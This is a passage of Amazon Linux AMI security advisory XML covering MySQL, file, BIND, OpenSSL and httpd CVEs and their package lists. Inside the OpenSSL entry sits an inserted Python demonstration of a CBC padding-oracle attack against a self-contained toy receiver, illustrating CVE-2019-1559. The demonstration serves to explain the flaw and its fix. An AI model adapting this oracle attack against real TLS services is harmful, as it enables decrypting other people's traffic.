1666745:
CVE-2019-2486 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2019)
CVE-2019-2482:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: PS). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666744:
CVE-2019-2482 mysql: Server: PS unspecified vulnerability (CPU Jan 2019)
CVE-2019-2481:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666743:
CVE-2019-2481 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2455:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666742:
CVE-2019-2455 mysql: Server: Parser unspecified vulnerability (CPU Jan 2019)
CVE-2019-2434:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666740:
CVE-2019-2434 mysql: Server: Parser unspecified vulnerability (CPU Jan 2019)
CVE-2019-2420:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666738:
CVE-2019-2420 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2420" title="" id="CVE-2019-2420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2434" title="" id="CVE-2019-2434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2455" title="" id="CVE-2019-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2481" title="" id="CVE-2019-2481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2482" title="" id="CVE-2019-2482" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2486" title="" id="CVE-2019-2486" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2503" title="" id="CVE-2019-2503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2507" title="" id="CVE-2019-2507" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2510" title="" id="CVE-2019-2510" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2528" title="" id="CVE-2019-2528" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2529" title="" id="CVE-2019-2529" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2531" title="" id="CVE-2019-2531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2532" title="" id="CVE-2019-2532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2534" title="" id="CVE-2019-2534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2537" title="" id="CVE-2019-2537" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-common" version="5.7.25" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-common-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.25" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-debuginfo-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.25-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1182</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1182: low priority package update for nvidia</title><issued date="2019-03-21 19:07:00" /><updated date="2019-03-25 22:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6260:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6260" title="" id="CVE-2018-6260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nvidia-dkms" version="410.104" release="2018.03.111.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-dkms-410.104-2018.03.111.amzn1.x86_64.rpm</filename></package><package name="nvidia" version="410.104" release="2018.03.111.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-410.104-2018.03.111.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1186</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1186: medium priority package update for file</title><issued date="2019-03-21 22:08:00" /><updated date="2019-03-25 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8907:
do_core_note in readelf.c in libmagic.a in file 5.35 allows remote attackers to cause a denial of service (stack corruption and application crash) or possibly have unspecified other impact.
1679138:
CVE-2019-8907 file: do_core_note in readelf.c allows remote attackers to cause a denial of service
CVE-2019-8906:
do_core_note in readelf.c in libmagic.a in file 5.35 has an out-of-bounds read because memcpy is misused.
1679175:
CVE-2019-8906 file: out-of-bounds read in do_core_note in readelf.c
CVE-2019-8905:
do_core_note in readelf.c in libmagic.a in file 5.35 has a stack-based buffer over-read, related to file_printable, a different vulnerability than CVE-2018-10360.
1679181:
CVE-2019-8905 file: stack-based buffer over-read in do_core_note in readelf.c
CVE-2019-8904:
do_bid_note in readelf.c in libmagic.a in file 5.35 has a stack-based buffer over-read, related to file_printf and file_vprintf.
1679188:
CVE-2019-8904 file: stack-based buffer over-read in do_bid_note in readelf.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8904" title="" id="CVE-2019-8904" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8905" title="" id="CVE-2019-8905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8906" title="" id="CVE-2019-8906" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8907" title="" id="CVE-2019-8907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-magic" version="5.34" release="3.37.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.34-3.37.amzn1.noarch.rpm</filename></package><package name="file-static" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="python26-magic" version="5.34" release="3.37.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.34-3.37.amzn1.noarch.rpm</filename></package><package name="file-devel" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.34" release="3.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-devel-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-static" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.34-3.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1187</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1187: medium priority package update for bind</title><issued date="2019-04-04 19:13:00" /><updated date="2019-04-09 16:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5741:
To provide fine-grained controls over the ability to use Dynamic DNS (DDNS) to update records in a zone, BIND 9 provides a feature called update-policy. Various rules can be configured to limit the types of updates that can be performed by a client, depending on the key used when sending the update request. Unfortunately, some rule types were not initially documented, and when documentation for them was added to the Administrator Reference Manual (ARM) in change #3112, the language that was added to the ARM at that time incorrectly described the behavior of two rule types, krb5-subdomain and ms-subdomain. This incorrect documentation could mislead operators into believing that policies they had configured were more restrictive than they actually were. This affects BIND versions prior to BIND 9.11.5 and BIND 9.12.3.
1631131:
CVE-2018-5741 bind: Incorrect documentation of krb5-subdomain and ms-subdomain update policies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5741" title="" id="CVE-2018-5741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-utils" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1188</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1188: medium priority package update for openssl</title><issued date="2019-04-04 19:13:00" /><updated date="2019-04-09 16:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1559:
If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable &quot;non-stitched&quot; ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). Fixed in OpenSSL 1.0.2r (Affected 1.0.2-1.0.2q).
1683804:
CVE-2019-1559 openssl: 0-byte record padding oracle
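The mechanism behind CVE-2019-1559, as an added example that is not part of this advisory and not OpenSSL code: a toy MAC-then-encrypt CBC record layer in Python whose receiver can run in a leaky mode (an invalid-padding failure and an invalid-MAC failure are reported differently) or a uniform mode. The attacker code shows what that distinction buys: against the leaky receiver it recovers a plaintext byte from ciphertext alone, against the uniform receiver it gets nothing. Assumptions of the demo, none of them from the advisory: a 4-round Feistel construction stands in for the block cipher, the tag is HMAC-SHA256 truncated to 16 bytes, keys and the sample record are generated inline, and the observable difference is modelled as a return value (in the real bug it is the application's behaviour after calling SSL_shutdown() twice, which the remote peer observes).

```python
import hashlib
import hmac
import os

BLOCK = 16    # block size of the toy cipher, as for AES-CBC records
MAC_LEN = 16  # truncated HMAC-SHA256 tag (toy size): a 0-byte record is then exactly two blocks

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):
    # Feistel round function: keyed and one-way, truncated to the 8-byte half block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    # A 4-round Feistel network stands in for AES; being invertible is all CBC needs.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right

def _mac(mac_key, data):
    return hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]

def seal(enc_key, mac_key, iv, payload):
    # TLS-style MAC-then-encrypt: payload, tag, then pad_len + 1 bytes each equal to pad_len.
    body = payload + _mac(mac_key, payload)
    pad_len = BLOCK - 1 - (len(body) % BLOCK)
    body += bytes([pad_len]) * (pad_len + 1)
    out, prev = b"", iv
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(enc_key, _xor(body[i:i + BLOCK], prev))
        out += prev
    return out

def open_record(enc_key, mac_key, iv, ct, distinguishable):
    # Returns "ok" or an error. The leaky receiver (distinguishable=True) reports bad
    # padding and a bad MAC differently, which is the oracle; the hardened receiver
    # returns one generic error and runs the MAC check on both paths.
    if not ct or len(ct) % BLOCK:
        return "decrypt_error"
    body, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        body += _xor(block_decrypt(enc_key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    pad_len = body[-1]
    pad_ok = (len(body) >= pad_len + 1 + MAC_LEN
              and body[-(pad_len + 1):] == bytes([pad_len]) * (pad_len + 1))
    start = len(body) - ((pad_len + 1 + MAC_LEN) if pad_ok else MAC_LEN)
    mac_ok = hmac.compare_digest(body[start:start + MAC_LEN], _mac(mac_key, body[:start]))
    if pad_ok and mac_ok:
        return "ok"
    if distinguishable:
        return "bad_mac" if pad_ok else "bad_padding"
    return "decrypt_error"

def recover_last_byte(oracle, prev_block, target_block):
    # Classic CBC padding-oracle step driven only by the padding-vs-MAC distinction:
    # find R whose last byte makes D(target)[15] ^ R[15] == 0, a valid 1-byte pad,
    # which the leaky receiver reports as "bad_mac" instead of "bad_padding".
    base = bytearray(os.urandom(BLOCK))
    for guess in range(256):
        r = bytes(base[:15]) + bytes([guess])
        if oracle(r + target_block) != "bad_mac":
            continue
        # Rule out a longer pad that happened to be valid: corrupting plaintext byte 14
        # leaves a 1-byte pad valid but breaks every longer one.
        r2 = bytes(base[:14]) + bytes([base[14] ^ 0xFF, guess])
        if oracle(r2 + target_block) != "bad_mac":
            continue
        return guess ^ prev_block[15]
    return None  # no usable oracle: the hardened receiver never says which check failed

def demo(distinguishable):
    # Constructed sample: fresh random keys, one secret record, and an attacker who can
    # only submit ciphertexts and observe the receiver's reaction.
    enc_key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(16)
    secret = b"session-token-4242"
    ct = seal(enc_key, mac_key, iv, secret)
    oracle = lambda probe: open_record(enc_key, mac_key, bytes(BLOCK), probe, distinguishable)
    return recover_last_byte(oracle, iv, ct[:BLOCK]), secret[BLOCK - 1]

def roundtrip(payload, distinguishable=False):
    k1, k2, iv = os.urandom(16), os.urandom(16), os.urandom(16)
    return open_record(k1, k2, iv, seal(k1, k2, iv, payload), distinguishable)
```

Calling demo(True) returns a pair whose two values match (the recovered byte equals the secret's sixteenth byte); demo(False) returns None for the recovered byte. The uniform return value is only the visible half of the fix: a receiver that skips the MAC check when padding is bad also leaks through timing, so production code, as OpenSSL's own fix does, processes both failure paths in constant time and emits the same alert for both.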
CVE-2018-5407:
A microprocessor side-channel vulnerability was found on SMT (e.g., Hyper-Threading) architectures. An attacker running a malicious process on the same physical core as the victim process can extract certain secret information.
1645695:
CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407" title="" id="CVE-2018-5407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1559" title="" id="CVE-2019-1559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.150.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.150.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" 
release="16.150.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.150.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1189</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1189: important priority package update for httpd24</title><issued date="2019-04-05 20:05:00" /><updated date="2019-08-06 21:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0220:
1695036:
CVE-2019-0220 httpd: URL normalization inconsistency
CVE-2019-0217:
A race condition was found in mod_auth_digest when the web server was running in a threaded MPM configuration. It could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions.
1695020:
CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition
CVE-2019-0215:
In Apache HTTP Server 2.4 releases 2.4.37 and 2.4.38, a bug in mod_ssl when using per-location client certificate verification with TLSv1.3 allowed a client to bypass configured access control restrictions.
1695025:
CVE-2019-0215 httpd: mod_ssl: access control bypass when using per-location client certification authentication
CVE-2019-0211:
1694980:
CVE-2019-0211 httpd: privilege escalation from modules scripts
CVE-2019-0197:
1695042:
CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade
CVE-2019-0196:
1695030:
CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0196" title="" id="CVE-2019-0196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0197" title="" id="CVE-2019-0197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211" title="" id="CVE-2019-0211" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0215" title="" id="CVE-2019-0215" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0217" title="" id="CVE-2019-0217" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0220" title="" id="CVE-2019-0220" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.39" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.39-1.87.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.39" release="1.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.39" release="1.87.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.39" release="1.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.39" release="1.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.39-1.87.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.39" release="1.87.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.39" release="1.87.amzn1" epoch="0" 